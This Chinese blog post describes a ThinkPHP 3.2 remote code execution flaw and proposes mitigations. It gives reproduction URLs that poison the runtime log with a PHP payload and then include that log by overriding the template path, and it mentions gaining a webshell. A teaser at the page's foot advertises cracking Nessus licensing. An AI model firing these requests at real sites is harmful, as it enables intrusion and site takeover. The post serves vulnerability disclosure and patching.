当前位置:首页 > 网络安全交流 > 正文内容

ThinkPHP 3.2远程代码执行漏洞

14324472931年前 (2024-04-07)网络安全交流941

ThinkPHP 3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。

复现:

https://网址/index.php?m=--><?=phpinfo();?>

目的:通过错误的m参数导致thinkphp报错,写入至日志文件

https://网址/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_04_07.log      log文件名为当前日期

通过篡改模板文件的路径导致被注入的在此处执行,通过该注入方式,将可以上传webshell获取网站的最终权限。
该漏洞在thinkphp 3.2.5内已修复

修复建议:
1.修改日志文件的命名规则,加入随机字符串来防止被猜测数文件名称。
2.限制模板文件的引用后缀名检查,防止越界访问文件。

扫描二维码推送至手机访问。

版权声明:本文由爱开发博客发布,如需转载请注明出处。

本文链接:https://www.lovekf.cn/?id=20

分享给朋友:

“ThinkPHP 3.2远程代码执行漏洞” 的相关文章

Nessus破解

Nessus破解

先将Nessus离线激活,离线激活码申请地址Plugin Registration | Tenable® (nessus.org)# Nessus如何解除IP限制以及解决重启失效的后遗症1.解除IP限制1.获取当前plugins的版本号。https://plugins.nessus.org/v2/p...

php webshell查杀脚本

//不完善,任然需要继续完善 <?php function upbaiduscan($path) {     $url = "https://scanner.baidu.com/enqueue&qu...

frps服务器上有网站如何不影响映射其他域名

文章又名:frp和Nginx(宝塔一类的设备共存)这个方法利用的是nginx做转发,把没有在服务器使用的泛域名其他的解析到frp上的https和http端口,然后再在Nginx Proxy Manager上转发到对应的站点,此办法有一个小小的缺点,证书过期后需要服务器重新更换证书,后期将尝试解决方案...

netcraft反钓鱼举报和拦截

目前网络环境中钓鱼网站数不胜数,netcraft作为网络钓鱼防护、域名保护、品牌保护的领先强者,可以快速处理钓鱼网站。 1.浏览器保护Netcraft 的免费浏览器扩展提供实时增强的保护,防止恶意网站保护您免受网络钓鱼、虚假商店和恶意脚本(如 JavaScript 撇油器和加密货币矿工)的侵害。浏...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。